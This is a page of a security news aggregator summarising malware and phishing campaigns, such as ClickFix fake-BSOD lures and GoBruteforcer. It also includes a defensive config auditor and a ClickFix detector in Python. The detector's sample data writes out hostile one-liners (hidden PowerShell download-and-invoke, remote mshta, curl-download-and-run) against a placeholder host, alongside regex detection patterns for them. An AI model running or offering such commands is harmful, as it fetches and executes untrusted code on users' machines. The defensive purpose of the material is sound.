Articles tagged "Malware"

Found 358 articles

A new phishing campaign is targeting employees by exploiting their anxiety around performance reviews. The attackers are sending emails that impersonate management or HR, claiming to discuss performance evaluations scheduled for October 2025 and falsely hinting at potential layoffs. This tactic aims to create urgency and fear, prompting recipients to click on malicious links or download malware. Companies and employees need to be vigilant, as these scams can lead to data breaches or financial loss. The incident highlights the need for better cybersecurity awareness and training, especially during sensitive times like performance review periods.

Impact: Employees of companies receiving the phishing emails, specifically those concerned about performance reviews.
Remediation: Employees should be trained to recognize phishing emails and verify the authenticity of unexpected communications from management or HR. Regular updates on cybersecurity practices should be implemented.
Read Original

Researchers have uncovered a web skimming campaign that has been stealing payment card data from online checkout pages since January 2022. The skimmer harvests card details for several major payment networks, including American Express, Mastercard, and UnionPay, from the checkout pages of enterprise merchants that accept them. The malicious script captures card numbers and related fields as users type them during a transaction, so customers of the affected merchants are at risk of fraud and identity theft. Businesses should harden their checkout pages, and users should monitor their financial statements for suspicious activity.

Impact: American Express, Diners Club, Discover, JCB Co., Ltd., Mastercard, UnionPay
Remediation: Businesses should enhance their security measures, including deploying web application firewalls, monitoring checkout-page JavaScript for unauthorized changes, and educating users about safe online shopping practices.
Read Original

A 44-year-old man has been sentenced to prison for installing remote access malware on the systems of a logistics company in the Netherlands. He was able to carry out this cyberattack with assistance from some employees of the firm. The malware allowed him to gain unauthorized access to sensitive information, raising serious concerns about insider threats and the security of critical infrastructure. This incident serves as a reminder for companies to strengthen their cybersecurity measures and ensure that employees are aware of the risks associated with insider collaboration. The case highlights the increasing need for vigilance in protecting sensitive systems from both external and internal threats.

Impact: Systems of a logistics company in the Netherlands, compromised with remote access malware installed with help from insiders
Remediation: Companies should enhance employee training on cybersecurity risks and implement stricter access controls to prevent insider threats.
Read Original
Actively Exploited

The latest Security Affairs Malware newsletter covers a range of malware-related issues affecting users and organizations globally. One notable threat is the VVS Discord Stealer, which employs Pyarmor to obfuscate its code and evade detection. Additionally, researchers are raising alarms about malicious NPM packages that deliver the NodeCordRAT, a remote access tool that can compromise systems. The newsletter also discusses a new campaign linked to the Astaroth worm, which is being spread through WhatsApp in Brazil. These findings highlight the ongoing challenges in malware detection and the evolving tactics used by cybercriminals, putting many users at risk.

Impact: Discord users targeted by the VVS Discord Stealer, developers who install the malicious NPM packages carrying NodeCordRAT, and WhatsApp users in Brazil targeted by the Astaroth campaign
Remediation: Users should be cautious of suspicious downloads and keep their security software up to date. Developers should review NPM dependencies before installing them, and messaging-app users should avoid opening unverified links or attachments.
Read Original

MuddyWater, an Iranian hacking group, has launched a spear-phishing campaign targeting various sectors in the Middle East, including diplomatic, maritime, financial, and telecom organizations. The attackers are using malicious Word documents that employ icon spoofing to trick users into activating a Rust-based remote access tool (RAT) known as RustyWater. This malware allows for asynchronous command and control, registry persistence, and anti-analysis capabilities, making it difficult for victims to detect and remove. The implications of this campaign are significant, as it could compromise sensitive information and disrupt critical infrastructure in the affected sectors. Organizations in these areas should be vigilant and enhance their cybersecurity measures to protect against such targeted attacks.

Impact: Diplomatic, maritime, financial, and telecom sectors in the Middle East
Remediation: Organizations should implement strong email filtering, conduct security awareness training for employees, and ensure that all systems are up to date with the latest security patches.
Read Original
Actively Exploited

The FBI has issued a warning about a phishing campaign linked to North Korea's Kimsuky APT group, which is using QR codes as part of their tactics. This group is known for targeting individuals and organizations, particularly in sectors like defense and technology. By embedding malicious links in QR codes, attackers aim to trick victims into providing sensitive information or downloading malware. This method is particularly concerning as QR codes are increasingly used in everyday transactions, making it easier for attackers to exploit unsuspecting users. Organizations and individuals should be vigilant and verify the legitimacy of QR codes before scanning them, as this campaign highlights a growing trend in cyber threats.

Impact: Individuals and organizations, particularly in the defense and technology sectors, who scan the malicious QR codes
Remediation: Users should verify the destination of a QR code before following it, and organizations should include QR-code lures in their security awareness training.
Read Original

The China-linked hacking group UAT-7290 has been actively spying on telecom providers in South Asia and Southeastern Europe since 2022. This group uses modular malware, including tools named RushDrop, DriveSwitch, and SilentRaid, to infiltrate and monitor their targets. By embedding deeply within the victim networks, they conduct extensive espionage operations that could compromise sensitive communications and data. The ongoing attacks raise concerns about the vulnerability of telecom infrastructure in these regions and the potential risks to national security and privacy for users. As these threats continue to evolve, it is crucial for telecom companies to enhance their cybersecurity measures to protect against such sophisticated espionage tactics.

Impact: Telecom providers in South Asia and Southeastern Europe
Remediation: Telecom companies should enhance network security measures, implement regular security audits, and monitor for unusual activity to mitigate risks.
Read Original
Actively Exploited

Attackers are combining social engineering lures, including fake CAPTCHA checks and counterfeit Blue Screen of Death (BSOD) messages, to get users to execute harmful code themselves. In this technique, known as ClickFix, the page instructs the victim to copy a command and paste it into the Windows Run dialog or a terminal, so the malicious script is launched by the user rather than by an exploit. The attacks primarily target Windows users who may panic upon seeing the fake BSOD, believing their computer has crashed. Users should treat any web page or error message that asks them to paste commands as hostile and verify the legitimacy of error messages before acting on them.

Impact: Windows users who follow the pasted-command instructions
Remediation: Users should avoid copying and pasting code from untrusted sources and verify system messages before responding to them. Keeping antivirus software updated and using browser security settings can also help mitigate these risks.
Read Original

A new wave of attacks using the GoBruteforcer malware is targeting cryptocurrency and blockchain projects through databases exposed to the internet. Researchers believe that many of these databases were set up from example configurations, possibly AI-generated, likely leaving the template's default or guessable credentials in place. That makes them easy targets for brute-force attacks, in which the malware tries large numbers of credential combinations until one succeeds. The focus on crypto and blockchain projects is particularly concerning given the value of the assets and data involved. Companies in this space need to ensure their database servers are not publicly reachable and are configured with unique, strong credentials, as the risk of data breaches and financial losses is significant.

Impact: Databases of cryptocurrency and blockchain projects running on servers configured from AI-generated example templates and exposed to the internet
Remediation: Do not expose databases directly to the internet, replace template credentials with strong unique passwords, enable failed-login throttling where the database supports it, and regularly audit server configurations.
Read Original
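The GoBruteforcer item above comes down to two configuration mistakes that copied example templates tend to leave in place: a database reachable from the internet, and a credential that is empty, a placeholder, or short enough to guess online. The following Python is an added example, not code from the article or from the researchers who reported the campaign; it audits a service description and a .env file for exactly those mistakes, with the weak setting beside the hardened one. The DbService fields, the TEMPLATE_PASSWORDS list, the placeholder pattern and the sample .env text are constructed assumptions for the example.

```python
"""Configuration audit for the exposure pattern the GoBruteforcer campaign abuses.

Added example, not code from the article or from the researchers who reported the
campaign. It checks a database service description and a .env file for the mistakes
that copied example configurations (hand-written or AI-generated) tend to carry:
a listener bound to every interface and published, no authentication, a placeholder
or short password, and no throttle on failed logins. The DbService fields, the
placeholder-password list and the sample .env text are constructed for the example.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Values example configs ship with; constructed short list, extend it from real wordlists.
TEMPLATE_PASSWORDS = {
    "password", "changeme", "secret", "admin", "root", "postgres", "mysql", "redis",
    "mongo", "example", "your_password_here", "yourpassword", "password123", "123456", "test",
}
# Placeholder shapes such as YOUR_..., <password>, ${DB_PASS} that were never replaced.
PLACEHOLDER_RE = re.compile(r"(?i)^(your|my|change|example|placeholder|replace|insert|xxx|<.*>|\$\{.*\})")


@dataclass
class DbService:
    name: str
    bind_address: str                         # address the listener binds to
    published: bool                           # port mapped onto a public interface
    auth_required: bool
    password: str
    failed_login_limit: Optional[int] = None  # lockout/throttle threshold; None = unlimited
    allowed_cidrs: List[str] = field(default_factory=list)  # source allowlist; empty = anyone


def password_problem(pw: str) -> Optional[str]:
    """Return why a password is brute-forceable, or None if it is acceptable."""
    if not pw:
        return "empty password"
    if pw.lower() in TEMPLATE_PASSWORDS or PLACEHOLDER_RE.match(pw):
        return "template/placeholder password"
    if len(pw) < 16:
        return "short password (<16 chars), feasible to brute force online"
    return None


def audit(svc: DbService) -> List[str]:
    """Return the list of exposure findings for one service (empty list = nothing found)."""
    findings = []
    exposed = svc.bind_address in ("0.0.0.0", "::", "*") and svc.published and not svc.allowed_cidrs
    if exposed:
        findings.append(f"{svc.name}: listener reachable from any source "
                        f"(bind {svc.bind_address}, port published, no allowlist)")
    if not svc.auth_required:
        findings.append(f"{svc.name}: authentication disabled")
    else:
        problem = password_problem(svc.password)
        if problem:
            findings.append(f"{svc.name}: {problem}")
    if exposed and svc.failed_login_limit is None:
        findings.append(f"{svc.name}: no failed-login throttling, so guessing is unbounded")
    return findings


ENV_LINE = re.compile(r"^\s*(?:export\s+)?([A-Za-z_][A-Za-z0-9_]*)\s*=\s*(.*?)\s*$")


def parse_env(text: str) -> Dict[str, str]:
    """Parse KEY=VALUE lines; comments and blanks are skipped, surrounding quotes stripped."""
    env = {}
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        m = ENV_LINE.match(line)
        if m:
            key, val = m.group(1), m.group(2)
            if len(val) >= 2 and val[0] == val[-1] and val[0] in "\"'":
                val = val[1:-1]
            env[key] = val
    return env


def audit_env(text: str) -> Dict[str, str]:
    """Map each credential-looking key to its password problem; acceptable keys are omitted."""
    out = {}
    for key, val in parse_env(text).items():
        if re.search(r"(?i)(password|passwd|secret|_pass)$", key):
            problem = password_problem(val)
            if problem:
                out[key] = problem
    return out


# Constructed .env in the style of a copied docker-compose example.
SAMPLE_ENV = """\
# database settings (copied from an example)
POSTGRES_USER=postgres
POSTGRES_PASSWORD=password
MONGO_INITDB_ROOT_PASSWORD=changeme
REDIS_PASSWORD=
API_DB_PASSWORD="Qv8#kL2m!pR9sT4wXz1"
"""

# The template setting beside the hardened one (both constructed).
EXPOSED = DbService("postgres-template", "0.0.0.0", True, True, "password")
HARDENED = DbService("postgres-hardened", "127.0.0.1", False, True, "Qv8#kL2m!pR9sT4wXz1",
                     failed_login_limit=10, allowed_cidrs=["10.0.0.0/8"])

if __name__ == "__main__":
    for svc in (EXPOSED, HARDENED):
        print(svc.name, audit(svc) or "no findings")
    print(audit_env(SAMPLE_ENV))
```

The length threshold and the placeholder list are deliberately crude: the point is that a database which is both reachable from anywhere and protected by a value lifted from an example is the whole precondition for a brute-force tool like GoBruteforcer, and either half of the fix (an allowlist or bind to a private address, or a unique long credential with throttling) removes it.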

Cybersecurity researchers have identified two malicious Chrome extensions that have collectively attracted over 900,000 users. These extensions, named 'Chat GPT for Chrome with GPT-5' and 'Claude Sonnet & DeepSeek AI,' are designed to steal conversations from OpenAI's ChatGPT and DeepSeek, along with users' browsing data. The stolen information is sent to servers controlled by the attackers. This incident raises significant concerns about user privacy and data security, as many individuals may unknowingly be exposing sensitive information through these extensions. Users are urged to remove these extensions immediately and review their online security practices to protect their data.

Impact: The more than 900,000 users who installed the two Chrome Web Store extensions; their ChatGPT and DeepSeek conversations and browsing data
Remediation: Users should remove the two extensions immediately, treat any credentials or secrets pasted into affected chats as exposed and rotate them, and monitor their accounts for unusual activity.
Read Original

A new malware campaign, tracked as PHALT#BLYX and built on the ClickFix technique, is targeting the hospitality sector by combining social engineering with abuse of the legitimate MSBuild.exe build tool to compile and run its payload. The multi-stage attack has been designed specifically to infiltrate hospitality organizations, putting sensitive data and operations at risk. Researchers note that the campaign uses deceptive prompts to get users to execute the malicious code themselves. Affected companies could face significant disruption and data breaches, so hospitality organizations need to remain vigilant and strengthen their defenses. The ongoing threat emphasizes the need for employee training and awareness to counter social engineering effectively.

Impact: Hospitality organizations; MSBuild.exe abused as the execution vehicle for the payload
Remediation: Organizations should train employees on social engineering, enhance email filtering, and monitor MSBuild.exe execution, especially launches outside developer workstations or with project files in user-writable directories. Regular updates and security patches should be applied to all systems.
Read Original

Cybersecurity researchers at Securonix have reported a new campaign targeting the European hospitality sector, known as PHALT#BLYX. This campaign uses fake booking emails to trick hotel staff into clicking on links that lead to counterfeit blue screen of death (BSoD) error pages. By doing so, attackers aim to install a remote access trojan called DCRat on the victims' systems. This type of malware allows hackers to gain unauthorized access to sensitive information and control over the infected devices. The incident underscores the need for heightened vigilance among hotel employees regarding suspicious emails and links, as these tactics can lead to severe security breaches.

Impact: European hospitality sector, hotel staff, systems infected with DCRat
Remediation: Employees should be trained to recognize phishing attempts and avoid clicking on suspicious links. Implementing email filtering and security software can help block malicious emails.
Read Original
Actively Exploited

Email continues to be the main entry point for cyber attackers, with significant increases in various types of email threats. Malware delivered through email surged by over 130% year-over-year, while phishing scams rose by more than 20% and other scams increased by 30%. These alarming trends expose vulnerabilities across different industries, indicating that many security teams are still missing critical gaps in their defenses. As attackers increasingly exploit email for impersonation and account takeover, companies must reassess their email security strategies to better protect sensitive information and prevent breaches. The growing reliance on email as a communication tool makes it essential for organizations to prioritize security measures in this area.

Impact: Email systems and users across various industries
Remediation: Strengthen email security protocols, implement multi-factor authentication, and conduct regular employee training on phishing awareness.
Read Original

A new social engineering attack called ClickFix is targeting the hospitality industry in Europe by using fake Windows Blue Screen of Death (BSOD) screens. This scheme tricks users into believing their systems have crashed, prompting them to manually compile and run malicious software. The attackers are specifically focusing on employees in hotels and related businesses, making this a significant threat to sensitive customer data and operational continuity. Companies in this sector need to raise awareness among staff and implement training to recognize such scams. The use of a familiar error screen is particularly deceptive, as it plays on users' fears of system failures, leading them to take harmful actions without realizing the risks.

Impact: Windows systems of hotels and related businesses in Europe
Remediation: Users should be trained to recognize social engineering tactics and never run commands or programs that a web page or error screen asks them to execute. Regular software updates and security patches for operating systems should be applied. Endpoint protection solutions may help detect and block the resulting activity.
Read Original
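The ClickFix items above (the fake-CAPTCHA and BSOD lures, and the PHALT#BLYX campaign's use of MSBuild.exe) all end the same way: the victim launches a script interpreter or build tool by hand from the Run dialog or a terminal. The following Python is an added example, not code from any of the original articles or from Securonix, showing what a detection over process-creation telemetry can look for: hidden or encoded PowerShell, download-and-invoke one-liners, mshta pulling remote content, curl/certutil downloads into user directories that are then executed, and MSBuild compiling a project file from a user-writable path. The ProcEvent fields, rule names, the INTERACTIVE_PARENTS set and the sample records are all assumptions constructed for the example.

```python
"""Heuristic detector for ClickFix-style command execution.

Added example, not code from the original articles, from Securonix, or from the
PHALT#BLYX write-ups. It scans process-creation records (the shape an EDR or Sysmon
Event ID 1 feed gives you) for the commands a ClickFix lure asks the victim to paste:
a hidden or encoded PowerShell one-liner that downloads and invokes a payload, mshta
fetching remote content, a curl/certutil download into a user directory that is then
executed, or MSBuild.exe compiling a project file out of a user-writable path. The
field names, rule names and sample records are constructed for the example.
"""
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class ProcEvent:
    parent_image: str   # process that spawned this one (explorer.exe for a Win+R Run dialog)
    image: str
    command_line: str


# Each rule is (name, pattern). The patterns are deliberately loose: they surface
# candidates for triage and are not meant to be bypass-proof signatures.
RULES = [
    ("powershell_hidden_or_encoded", re.compile(
        r"(?i)\b(powershell|pwsh)(\.exe)?\b.*?"
        r"(-w(indowstyle)?\s+h(idden)?\b|-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,})")),
    ("download_then_invoke", re.compile(
        r"(?i)\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|curl|wget)\b"
        r".*?\|\s*(iex|invoke-expression)\b"
        r"|\b(iex|invoke-expression)\b\s*\(?.*?\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b")),
    ("mshta_remote_content", re.compile(
        r"(?i)\bmshta(\.exe)?\b.*?\b(https?:|javascript:|vbscript:)")),
    ("download_to_user_dir_then_run", re.compile(
        r"(?i)\b(curl|certutil|bitsadmin|wget)\b[^&|]*?"
        r"(%temp%|%appdata%|%localappdata%|%public%|\\temp\\|\\appdata\\|\\downloads\\)"
        r"[^&|]*?(&&|&|;|\|)")),
    ("msbuild_project_in_user_writable_path", re.compile(
        r"(?i)\bmsbuild(\.exe)?\b.*?[\\/]"
        r"(users[\\/][^\\/]+[\\/]appdata|temp|downloads|programdata|public)[\\/].*?\.(proj|csproj|vbproj|xml)\b")),
]

# Parents that mean a human pasted the command (Run dialog) or a browser launched it.
# Assumption for the example: real telemetry may name or case these differently.
INTERACTIVE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe"}


def score_event(ev: ProcEvent) -> Dict:
    """Return the rule hits and a score for one event; score 0 means nothing matched."""
    hits = [name for name, pat in RULES if pat.search(ev.command_line)]
    score = len(hits)
    if hits and ev.parent_image.lower() in INTERACTIVE_PARENTS:
        score += 1   # LOLBin launched straight from the shell or a browser: the ClickFix shape
    return {"image": ev.image, "rules": hits, "score": score}


def scan(events: List[ProcEvent]) -> List[Dict]:
    """Scan a batch of events and return only those that matched at least one rule."""
    findings = []
    for i, ev in enumerate(events):
        result = score_event(ev)
        if result["score"]:
            result["index"] = i
            findings.append(result)
    return findings


# Constructed sample telemetry; URLs use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    ProcEvent("explorer.exe", "powershell.exe",
              r'powershell -w hidden -NoP -c "iex (iwr -UseBasicParsing http://example.invalid/fix.ps1)"'),
    ProcEvent("explorer.exe", "mshta.exe", r"mshta http://example.invalid/captcha.hta"),
    ProcEvent("cmd.exe", "MSBuild.exe",
              r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe C:\Users\guest\AppData\Local\Temp\bsod.proj"),
    ProcEvent("devenv.exe", "MSBuild.exe", r"MSBuild.exe C:\src\app\app.csproj /t:Build"),   # benign build
    ProcEvent("explorer.exe", "powershell.exe", r"powershell -NoProfile -Command Get-Service"),  # benign admin
    ProcEvent("explorer.exe", "cmd.exe",
              r"cmd /c curl -s http://example.invalid/s -o %TEMP%\svc.exe && %TEMP%\svc.exe"),
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(finding)
```

The rules are triage heuristics, not a signature. A real deployment would feed actual EDR or Sysmon Event ID 1 records into scan() and tune the parent list, and an attacker can rephrase the command line (alias cmdlets, split the download and the execution across two commands) to dodge any one pattern, which is why the parent-process context is scored separately: a build tool or script host spawned directly by explorer.exe with a user-writable input is the part of the ClickFix chain that is hardest to disguise.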

A group of hackers known as UAC-0184, believed to be aligned with Russia, has been targeting Ukrainian military and government organizations by using the Viber messaging app. They are sending malicious ZIP files that likely contain malware designed for espionage. According to the 360 Threat Intelligence Center, these activities have been ongoing and are part of a broader strategy to gather intelligence on Ukraine's military operations. This incident highlights the ongoing cyber warfare between Russia and Ukraine, emphasizing the need for heightened security measures within government and military communications. As the conflict continues, the use of widely used messaging platforms for cyber attacks poses significant risks to sensitive information.

Impact: Ukrainian military and government entities, Viber messaging platform
Remediation: Users should exercise caution when receiving ZIP files from unknown sources and consider enhancing security protocols for messaging applications.
Read Original
Page 18 of 24